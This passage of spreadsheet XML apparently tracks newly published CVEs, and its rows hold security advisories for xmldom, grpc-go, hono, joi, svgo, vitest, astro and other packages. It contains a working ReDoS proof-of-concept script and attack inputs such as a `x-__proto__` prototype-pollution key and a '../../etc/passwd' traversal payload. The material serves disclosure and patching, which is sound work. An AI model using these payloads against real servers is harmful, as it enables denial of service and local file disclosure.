- `lib/sax.js` line 120: https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L120

```js
/[ \t\n\r]+$/g
```

Applied to a string shaped `whitespace-run + one non-whitespace char` (e.g. the content of an end tag
`&lt;/   …   x&gt;`), the engine must, for every starting position, extend `[ws]+` to the end and then fail
the `$` anchor when the trailing non-whitespace char is present — classic O(n²) backtracking in the
length of the whitespace run. The trimmed substring is delimited only by `indexOf('&gt;')`, so the
attacker controls its length directly.

## Proof of Concept

```js
const { DOMParser } = require('@xmldom/xmldom'); // 0.8.x
const n = 64 * 1024;
const payload = '&lt;r&gt;&lt;/' + ' '.repeat(n) + 'x&gt;';
console.time('parse');
new DOMParser().parseFromString(payload, 'text/xml');
console.timeEnd('parse');
```

Measured (Node 18) — time quadruples per doubling of the whitespace run (canonical O(n²)):

| Whitespace run | Isolated regex | End-to-end `parseFromString` (0.8.13) |
|---|---|---|
|  4 KB | 5.6 ms   | 5.7 ms   |
|  8 KB | 22.7 ms  | 22.5 ms  |
| 16 KB | 88.6 ms  | 92 ms    |
| 32 KB | 354 ms   | 361 ms   |
| 64 KB | 1434 ms  | 1452 ms  |
| 128 KB | 5761 ms | —        |

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic scan (≈1.4 s at 64 KB; multi-second with larger inputs). No memory
blow-up, no data exposure, no integrity impact. Because XML is routinely accepted from untrusted
sources and parsed with default options, one request can stall a server.

## Affected Versions

Affected on the `0.7.x` and `0.8.x` lines (the trailing-whitespace trim was added in `0.7.0`, present
through `0.8.14`); the fix targets the `0.8.x` LTS patch. The `0.9.x` line rewrote end-tag parsing to
an anchored linear matcher and never had this regex, so it is **not** affected. No published unscoped
`xmldom` is affected — the vulnerable code exists only in a `0.7.0` git tag that was never released to
npm (`npm view xmldom` → `latest` = 0.6.0).

## Fix Applied

Anchors the end-tag trailing-whitespace trim so it runs in linear time instead of
backtracking quadratically on a long whitespace run. Byte-identical output. Non-breaking; 0.8.x-only.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60" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83619</t></is></c></row><row r="61"><c r="A61" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B61" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C61" s="5" t="inlineStr"><is><t>CVE-2026-84303</t></is></c><c r="D61" s="5" t="inlineStr" /><c r="E61" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F61" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G61" s="5" t="inlineStr" /><c r="H61" s="5" t="n"><v>0.003</v></c><c r="I61" s="5" t="inlineStr" /><c r="J61" s="5" t="inlineStr" /><c r="K61" s="5" t="inlineStr" /><c r="L61" s="5" t="inlineStr"><is><t>Go:google.golang.org/grpc</t></is></c><c r="M61" s="5" t="inlineStr"><is><t>1.83.1</t></is></c><c r="N61" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O61" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P61" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q61" s="5" t="inlineStr" /><c r="R61" s="5" t="inlineStr" /><c r="S61" s="5" t="inlineStr"><is><t>### Summary
A vulnerability in the xDS RBAC HTTP filter implementation in grpc-go allows remote attackers to bypass authorization policies (specifically DENY rules) by using mixed-case or canonical-case header matchers (e.g., X-Role instead of x-role). Additionally, the safety guards introduced by gRFC A41 to block grpc- prefixed headers can be evaded via variations in casing (e.g., Grpc-Status).

### Impact
When an operator defines an RBAC policy referencing headers containing uppercase letters (e.g. X-Role), grpc-go fails to match incoming metadata keys because they are unconditionally lowercased. Because of this case-sensitivity mismatch, a policy designed to block requests containing specific header values fails open: the rule is evaluated as a non-match, and traffic that should have been rejected is served.

Furthermore, gRFC A41 requires rejecting configuration schemas specifying header matchers starting with grpc-. Because this check is executed case-sensitively in grpc-go, attackers can bypass the validation by specifying titles like Grpc-Status.

### Patches
The problem is fixed in `master` and in the 1.83.1 release.</t></is></c><c r="T61" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84303</t></is></c></row><row r="62"><c r="A62" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B62" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C62" s="5" t="inlineStr"><is><t>CVE-2026-84363</t></is></c><c r="D62" s="5" t="inlineStr" /><c r="E62" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F62" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G62" s="5" t="inlineStr" /><c r="H62" s="5" t="n"><v>0.003</v></c><c r="I62" s="5" t="inlineStr" /><c r="J62" s="5" t="inlineStr" /><c r="K62" s="5" t="inlineStr" /><c r="L62" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M62" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N62" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O62" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P62" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q62" s="5" t="inlineStr" /><c r="R62" s="5" t="inlineStr" /><c r="S62" s="5" t="inlineStr"><is><t>### Summary

Hono's query parsing does not stop at the URL fragment: a `?` appearing after a `#` is treated as the start of a query string. As a result, the application can read request parameters that no other component involved in handling the request can see.

### Details

A fragment is never part of the query, and every standard URL consumer — browsers, `new URL()`, reverse proxies — ignores everything from the first `#` onward. Hono's routing followed that rule; its query helpers did not.

For one and the same request, this produces an interpretation differential:

- A component in front of the application that inspects the query string — filtering rules, parameter allow/deny lists, access logging — observes no parameters, while the application reads and acts on them.
- The cache middleware removed the fragment when building its cache key, so a response influenced by parameters carried inside the fragment could be stored under a key that did not reflect them and later returned to other users.

The same divergence reaches request validation and any middleware that reads query parameters.

This requires a request target containing a literal `#` to reach the application. Deployments on runtimes that normalise such a target — including Cloudflare Workers — are not affected, and neither are those behind an intermediary that strips the fragment.

### Impact

An attacker can cause the application to act on parameters that components in front of it never observe.

This may lead to:

- filtering rules, allow/deny lists, and audit logging being blind to parameters the application still processes
- a cached response being stored under a key that does not reflect the parameters used to produce it, and served to other users
- stored cross-site scripting, where such a parameter is reflected into a cached HTML response without escaping

This issue affects applications that read query parameters and run on a runtime that passes a literal `#` through to the request URL.</t></is></c><c r="T62" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84363</t></is></c></row><row r="63"><c r="A63" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B63" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C63" s="5" t="inlineStr"><is><t>CVE-2026-84364</t></is></c><c r="D63" s="5" t="inlineStr" /><c r="E63" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F63" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G63" s="5" t="inlineStr" /><c r="H63" s="5" t="n"><v>0.004</v></c><c r="I63" s="5" t="inlineStr" /><c r="J63" s="5" t="inlineStr" /><c r="K63" s="5" t="inlineStr" /><c r="L63" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M63" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N63" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O63" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P63" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q63" s="5" t="inlineStr" /><c r="R63" s="5" t="inlineStr" /><c r="S63" s="5" t="inlineStr"><is><t>### Summary

When `parseBody()` expands dot-separated form field names into nested objects, it does not limit the nesting depth or the total number of objects created. A request body well within a normal size limit can therefore allocate an object graph far larger than the request itself, and concurrent requests can exhaust the heap and terminate the process.

### Details

Each dot-separated segment of a field name creates an intermediate object. Neither the segments within a single field name nor the total across a request was bounded, and empty segments were preserved, so a field name could encode one nesting level per byte.

Both shapes produce the effect: a single deeply dotted field name, and a large number of shallowly dotted ones within one body. A request body size limit does not prevent it, because the amplification happens after the body has been accepted.

Dot-notation parsing is not enabled by default.

### Impact

An attacker who can reach an endpoint that parses request bodies with dot-notation enabled can send concurrent requests whose memory cost is disproportionate to their size.

This may lead to:

- exhaustion of the JavaScript heap and termination of the server process
- the service remaining unavailable until it is restarted

This issue affects applications that explicitly enable dot-notation parsing. Applications using the default behaviour are not affected.</t></is></c><c r="T63" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84364</t></is></c></row><row r="64"><c r="A64" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B64" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C64" s="5" t="inlineStr"><is><t>CVE-2026-84365</t></is></c><c r="D64" s="5" t="inlineStr" /><c r="E64" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F64" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G64" s="5" t="inlineStr" /><c r="H64" s="5" t="n"><v>0.003</v></c><c r="I64" s="5" t="inlineStr" /><c r="J64" s="5" t="inlineStr" /><c r="K64" s="5" t="inlineStr" /><c r="L64" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M64" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N64" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O64" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P64" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q64" s="5" t="inlineStr" /><c r="R64" s="5" t="inlineStr" /><c r="S64" s="5" t="inlineStr"><is><t>### Summary

The fix released for CVE-2026-39408 does not cover every traversal sequence. `toSSG()` can still write files outside the configured output directory when a route parameter contains consecutive parent-directory segments.

### Details

Static site generation builds each output path from the route path and the values supplied through `ssgParams`, then verifies that the result stays inside the output directory. That check normalizes the path with the same routine that built it, and the routine did not fully collapse runs of consecutive parent-directory segments. A value carrying enough of them produces a path the check accepts, but the filesystem resolves outside the output directory.

The earlier fix handled a single parent-directory segment, so it blocks the sequence reported at the time while leaving longer runs unhandled. The check also treated output directories that differ only in how they are rooted as equivalent.

This arises when an application generates a static site from route parameter values it does not fully control — slugs coming from a CMS, an API, or user submissions.

### Impact

A value reaching `ssgParams` from an untrusted source can cause build output to be written outside the intended output directory, carrying whatever content the route handler produced.

This may lead to:

- files being created or overwritten elsewhere in the build environment
- generated artifacts or deployment output being altered

This affects build-time static site generation only; request-time routing is not affected. Applications whose `ssgParams` values are entirely developer-controlled are not affected.</t></is></c><c r="T64" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84365</t></is></c></row><row r="65"><c r="A65" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B65" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C65" s="5" t="inlineStr"><is><t>CVE-2026-84367</t></is></c><c r="D65" s="5" t="inlineStr" /><c r="E65" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F65" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G65" s="5" t="inlineStr" /><c r="H65" s="5" t="n"><v>0.003</v></c><c r="I65" s="5" t="inlineStr" /><c r="J65" s="5" t="inlineStr" /><c r="K65" s="5" t="inlineStr" /><c r="L65" s="5" t="inlineStr"><is><t>npm:joi</t></is></c><c r="M65" s="5" t="inlineStr"><is><t>17.13.5, 18.2.4</t></is></c><c r="N65" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O65" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P65" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q65" s="5" t="inlineStr" /><c r="R65" s="5" t="inlineStr" /><c r="S65" s="5" t="inlineStr"><is><t>### Impact

Applications are affected only if a schema renames keys with a regular-expression source and a `Joi.expression()` / `Joi.x()` target that interpolates the pattern's own match data, combined with `{ multiple: true }`, for example `.rename(/^x-(.+)$/, Joi.x('{#1}'), { multiple: true })`. Because the target is rendered from the matched input key, an attacker who controls input keys can send `x-__proto__` with an object value and make the rename target render as `__proto__`, which sets the prototype of the object joi returns instead of creating a key on it. The global `Object.prototype` is not modified, so the effect is confined to the object returned by that one `validate()` call.

Schemas using a static string rename target are not affected, and neither are schemas left on the default `{ multiple: false }`.

### Patches

Versions 17.13.5 and 18.2.4 have been released to address the issue.

### Workarounds

1. Replace the template rename target with a static string target.
2. Keep the template but make the capture unable to produce `__proto__`, using a negative lookahead: `.rename(/^x-(?!__proto__$)(.+)$/, Joi.x('{#1}'), { multiple: true })`
3. Drop { multiple: true } from the rename, which stops the rename before the assignment.</t></is></c><c r="T65" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84367</t></is></c></row><row r="66"><c r="A66" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B66" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C66" s="5" t="inlineStr"><is><t>CVE-2026-84368</t></is></c><c r="D66" s="5" t="inlineStr" /><c r="E66" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F66" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G66" s="5" t="inlineStr" /><c r="H66" s="5" t="n"><v>0.003</v></c><c r="I66" s="5" t="inlineStr" /><c r="J66" s="5" t="inlineStr" /><c r="K66" s="5" t="inlineStr" /><c r="L66" s="5" t="inlineStr"><is><t>npm:@hapi/joi, npm:joi</t></is></c><c r="M66" s="5" t="inlineStr"><is><t>17.13.6, 18.2.5</t></is></c><c r="N66" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O66" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P66" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q66" s="5" t="inlineStr" /><c r="R66" s="5" t="inlineStr" /><c r="S66" s="5" t="inlineStr"><is><t>### Impact
An application that passes attacker-controlled data into joi's custom message configuration (`messages()`, `message()`, `prefs({ messages })`, `Joi.extend({ messages })` or `rule({ message })`) lets the attacker write properties onto `Object.prototype`, where every object in the process then inherits them. A key named `__proto__` was treated as a language name, and the code reused the object it found at that key, which resolves to the prototype rather than to a new own property; a key named `constructor` did the same to the `Object` function's statics. A consuming application that gates on the mere presence of a property (`if (user.isAdmin)`) can be made to take the wrong branch for every object it inspects.

This is not reachable from data that joi validates. Custom messages are schema-construction configuration, normally written by the application developer. Exploitation therefore requires an application that feeds untrusted input straight into schema construction.

### Patches
Upgrade to version 18.2.5 or 17.13.6.

### Workarounds
Do not pass untrusted input into `messages()`, `message()`, `prefs({ messages })`, `Joi.extend({ messages })` or `rule({ message })`. Or validate that they don't contain any `__proto__` or `constructor` property.</t></is></c><c r="T66" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84368</t></is></c></row><row r="67"><c r="A67" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B67" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C67" s="5" t="inlineStr"><is><t>CVE-2026-84369</t></is></c><c r="D67" s="5" t="inlineStr" /><c r="E67" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F67" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G67" s="5" t="inlineStr" /><c r="H67" s="5" t="n"><v>0.003</v></c><c r="I67" s="5" t="inlineStr" /><c r="J67" s="5" t="inlineStr" /><c r="K67" s="5" t="inlineStr" /><c r="L67" s="5" t="inlineStr"><is><t>npm:svgo</t></is></c><c r="M67" s="5" t="inlineStr"><is><t>2.8.4, 3.3.5, 4.1.0</t></is></c><c r="N67" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O67" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P67" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q67" s="5" t="inlineStr" /><c r="R67" s="5" t="inlineStr" /><c r="S67" s="5" t="inlineStr"><is><t>## Summary

SVGO's opt-in `removeScripts` plugin did not inspect executable HTML content inside SVG `&lt;foreignObject&gt;` elements. Applications that used this plugin as their only protection for untrusted SVG input could produce SVGs containing active HTML and expose users to cross-site scripting (XSS).

SVGO is an optimizer rather than a comprehensive sanitization library, but `removeScripts` is maintained for consumers that already rely on it to remove common script execution paths.

## Details

Although the plugin removed SVG and XHTML `&lt;script&gt;` elements, it left other HTML execution paths inside `&lt;foreignObject&gt;` unchanged. These included:

- event-handler attributes such as `onload` and `onbeforetoggle`;
- `srcdoc` documents, including on `&lt;iframe&gt;` elements;
- executable URLs in HTML attributes such as `action`, `data`, `formaction`, `href`, and `src`.

An attacker could place one of these payloads in an SVG. If an application optimized the untrusted SVG with `removeScripts` and then served the result in an active browser context, the payload could execute in the viewer's origin.

## Impact

Successful exploitation could allow script execution in the context where the optimized SVG is rendered. Depending on the embedding and origin configuration, this could expose cookies or local storage, modify content, or perform actions as the victim.

The plugin is opt-in, so consumers that do not enable `removeScripts`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preserves visual HTML inside SVG `&lt;foreignObject&gt;` elements while removing event attributes, `srcdoc`, and executable URL values from active HTML URL attributes.

SVGO v1 is no longer maintained. Users of v1 should upgrade to a supported release line.

## Workarounds

For hostile input, use a dedicated SVG sanitization tool before passing the SVG to SVGO. As defense in depth, applications can reject or remove `&lt;foreignObject&gt;` content and avoid serving user-controlled SVGs in an active same-origin context.</t></is></c><c r="T67" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84369</t></is></c></row><row r="68"><c r="A68" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B68" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C68" s="5" t="inlineStr"><is><t>CVE-2026-84370</t></is></c><c r="D68" s="5" t="inlineStr" /><c r="E68" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F68" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G68" s="5" t="inlineStr" /><c r="H68" s="5" t="n"><v>0.003</v></c><c r="I68" s="5" t="inlineStr" /><c r="J68" s="5" t="inlineStr" /><c r="K68" s="5" t="inlineStr" /><c r="L68" s="5" t="inlineStr"><is><t>npm:svgo</t></is></c><c r="M68" s="5" t="inlineStr"><is><t>2.8.4, 3.3.5, 4.1.0</t></is></c><c r="N68" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O68" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P68" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q68" s="5" t="inlineStr" /><c r="R68" s="5" t="inlineStr" /><c r="S68" s="5" t="inlineStr"><is><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is></c><c r="T68" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84370</t></is></c></row><row r="69"><c r="A69" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B69" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C69" s="5" t="inlineStr"><is><t>CVE-2026-84373</t></is></c><c r="D69" s="5" t="inlineStr" /><c r="E69" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F69" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G69" s="5" t="inlineStr" /><c r="H69" s="5" t="n"><v>0.004</v></c><c r="I69" s="5" t="inlineStr" /><c r="J69" s="5" t="inlineStr" /><c r="K69" s="5" t="inlineStr" /><c r="L69" s="5" t="inlineStr"><is><t>npm:@vitest/mocker, npm:vitest</t></is></c><c r="M69" s="5" t="inlineStr"><is><t>4.1.11, 5.0.0-rc.2</t></is></c><c r="N69" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O69" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P69" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q69" s="5" t="inlineStr" /><c r="R69" s="5" t="inlineStr" /><c r="S69" s="5" t="inlineStr"><is><t>## Summary
`@vitest/mocker` registers a redirect mock's target path without validating it
against the dev server's file-serving allowlist. An attacker who can reach the
dev server's WebSocket can register a redirect mock pointing outside the project
root; when the mocked module is requested, the plugin's `load` hook returns
`readFile(&lt;attacker path&gt;)` as the module source, disclosing local files.

This is exploitable **without authentication** only through the public
`mockerPlugin` / standalone `interceptorPlugin` exports (used by third-party dev
servers), which register the handler on Vite's unauthenticated HMR socket.
Vitest's own browser mode registers mocks over a **token-authenticated** RPC and
is not remotely reachable by default (see Scope).

## Affected code
`packages/mocker/src/node/interceptorPlugin.ts`.

The `load` hook is the file-read sink:

```ts
if (mock.type === 'redirect') {
  return readFile(mock.redirect, 'utf-8')
}
```

`mock.redirect` is derived from client input at registration time with no
boundary check:

```ts
if (event.type === 'redirect') {
  const redirectUrl = new URL(event.redirect)
  event.redirect = join(server.config.root, redirectUrl.pathname)
}
registry.register(event)
```

There is no `server.fs.allow` / `server.fs.deny` check and no assertion that the
resolved path stays within the project root.

## Registration paths and trust boundaries
- **Public `mockerPlugin` / `interceptorPlugin` (unauthenticated).** In
  `configureServer`, the plugin registers `server.ws.on('vitest:interceptor:register', …)`
  on Vite's HMR WebSocket. That socket performs no token, Origin, or same-origin
  check, so any client that can reach it can register a redirect mock. This is
  the path the "unauthenticated" impact applies to.
- **Vitest browser mode (authenticated).** Mocks register over the browser RPC
  (`registerMock`), which sits behind a per-run token (`isValidApiRequest`, a
  random `api.token`). The interceptor's `configureServer` socket is not used for
  registration here (in v5 it does not run at all, as the plugin is injected per
  environment). The same missing boundary check exists on the authenticated RPC
  path, but reaching it requires the token, so it is not a remote-unauthenticated
  read.

## Path handling
`new URL(redirect).pathname` combined with `join(root, pathname)` does **not**
confine reads to the root:

- Special/hierarchical schemes (`file:`, `http:`) are normalized by WHATWG URL,
  so `..` segments are collapsed and the result stays under the root. Payloads of
  the form `file:///../../etc/passwd` do **not** escape.
- A non-special (opaque) scheme preserves `..` in `pathname`, so
  `join(root, "../../…/etc/passwd")` resolves outside the root and reads an
  arbitrary file.

Even without escaping the root, the missing `server.fs` check allows reading any
in-root file the dev server would otherwise refuse to serve (for example an
in-root `.env` or source that is denied by `server.fs.deny`).

## Scope / preconditions
- This is a **development-server** issue. The dev server binds to `localhost` by
  default and is not reachable from the network unless the developer exposes it
  (`server.host` / `0.0.0.0`, a LAN bind, or a proxy).
- A raw (non-browser) client against a reachable server bypasses browser origin
  and CORS protections entirely and can both register the mock and read the
  response.
- A browser-based drive-by against a localhost server is substantially mitigated
  by Vite defaults: the default CORS origin allowlist is limited to `localhost`
  origins, and `server.allowedHosts` blocks DNS-rebinding, so a cross-origin page
  cannot read the file contents back.

## Impact
Disclosure of local files readable by the dev-server process (source, in-root
`.env`/secrets, and, via the opaque-scheme payload, files outside the project
root). No integrity or availability impact.

## Affected versions
Present since `@vitest/mocker` was introduced.

- **Affected: `@vitest/mocker` &gt;= 2.1.0** (shipped in `vitest` and
  `@vitest/browser` &gt;= 2.1.0), through 4.1.x and the 5.0.0 pre-releases.
- **Fixed:** Vitest 4.1.11 and 5.0.0. Older majors (2.1.x, 3.x) are not
  maintained and are not planned to receive the fix.

## Fix
Validate the resolved redirect target against Vite's file-serving allowlist
(`isFileLoadingAllowed`) before registering it, at every registration site, and
stop registering the interceptor WebSocket events in Vitest's browser mode
(mocks there flow through the authenticated RPC).</t></is></c><c r="T69" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84373</t></is></c></row><row r="70"><c r="A70" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B70" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C70" s="5" t="inlineStr"><is><t>CVE-2026-84375</t></is></c><c r="D70" s="5" t="inlineStr" /><c r="E70" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F70" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G70" s="5" t="inlineStr" /><c r="H70" s="5" t="n"><v>0.004</v></c><c r="I70" s="5" t="inlineStr" /><c r="J70" s="5" t="inlineStr" /><c r="K70" s="5" t="inlineStr" /><c r="L70" s="5" t="inlineStr"><is><t>npm:js-yaml</t></is></c><c r="M70" s="5" t="inlineStr"><is><t>3.15.2, 4.3.2</t></is></c><c r="N70" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O70" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P70" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q70" s="5" t="inlineStr" /><c r="R70" s="5" t="inlineStr" /><c r="S70" s="5" t="inlineStr"><is><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is></c><c r="T70" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84375</t></is></c></row><row r="71"><c r="A71" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B71" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C71" s="5" t="inlineStr"><is><t>CVE-2026-84376</t></is></c><c r="D71" s="5" t="inlineStr" /><c r="E71" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F71" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G71" s="5" t="inlineStr" /><c r="H71" s="5" t="n"><v>0.004</v></c><c r="I71" s="5" t="inlineStr" /><c r="J71" s="5" t="inlineStr" /><c r="K71" s="5" t="inlineStr" /><c r="L71" s="5" t="inlineStr"><is><t>npm:astro</t></is></c><c r="M71" s="5" t="inlineStr"><is><t>7.2.4</t></is></c><c r="N71" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O71" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P71" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q71" s="5" t="inlineStr" /><c r="R71" s="5" t="inlineStr" /><c r="S71" s="5" t="inlineStr"><is><t>## Summary

Astro stripped a configured `base` path from request pathnames using a string-prefix check that did not verify a path-segment boundary. With `base: "/app"`, a request to `/appX/admin` was treated as being under the base and resolved internally to the `/admin` route, while middleware still observed the public pathname `/appX/admin`. Middleware that authorizes routes by inspecting `context.url.pathname` could therefore be bypassed.

## Impact

An unauthenticated remote attacker can bypass pathname-based middleware authorization in applications that:

- Configure a non-root `base`.
- Protect base-prefixed routes in middleware using `context.url.pathname`.

Because routing and middleware resolved different effective pathnames, a request such as `/appX/admin` (or other single-character extensions like `/app2/admin` or `/app-/admin`) reached the protected `/admin` route without passing the middleware check that guards `/app/admin`. Astro's authentication guide demonstrates protecting routes in middleware via `context.url.pathname`, so this is a reasonable and expected pattern.

## Affected versions

`astro` &lt;= 7.2.3.

## Patches

Fixed in `astro` 7.2.4. Base stripping now requires the pathname to equal the base without its trailing slash, or to be followed by a `/`, so a prefix that does not end on a path-segment boundary is no longer treated as being under the base. Routing and `context.url.pathname` now resolve the same pathname.

## Workarounds

Upgrade to `astro` 7.2.4 or later. As a mitigation before upgrading, avoid relying solely on prefix checks of `context.url.pathname` for authorization, or reject requests whose pathname does not begin with the configured base followed by a path-segment boundary.

## Credits

Reported by @Ryoga-exe.</t></is></c><c r="T71" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84376</t></is></c></row><row r="72"><c r="A72" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B72" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C72" s="5" t="inlineStr"><is><t>CVE-2026-84378</t></is></c><c r="D72" s="5" t="inlineStr" /><c r="E72" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F72" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G72" s="5" t="inlineStr" /><c r="H72" s="5" t="n"><v>0.003</v></c><c r="I72" s="5" t="inlineStr" /><c r="J72" s="5" t="inlineStr" /><c r="K72" s="5" t="inlineStr" /><c r="L72" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M72" s="5" t="inlineStr"><is><t>2.10.0</t></is></c><c r="N72" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O72" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P72" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q72" s="5" t="inlineStr" /><c r="R72" s="5" t="inlineStr" /><c r="S72" s="5" t="inlineStr"><is><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is></c><c r="T72" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84378</t></is></c></row><row r="73"><c r="A73" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B73" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C73" s="5" t="inlineStr"><is><t>CVE-2026-84379</t></is></c><c r="D73" s="5" t="inlineStr" /><c r="E73" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F73" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G73" s="5" t="inlineStr" /><c r="H73" s="5" t="n"><v>0.003</v></c><c r="I73" s="5" t="inlineStr" /><c r="J73" s="5" t="inlineStr" /><c r="K73" s="5" t="inlineStr" /><c r="L73" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M73" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N73" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O73" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P73" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q73" s="5" t="inlineStr" /><c r="R73" s="5" t="inlineStr" /><c r="S73" s="5" t="inlineStr"><is><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is></c><c r="T73" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84379</t></is></c></row><row r="74"><c r="A74" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B74" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C74" s="5" t="inlineStr"><is><t>CVE-2026-84380</t></is></c><c 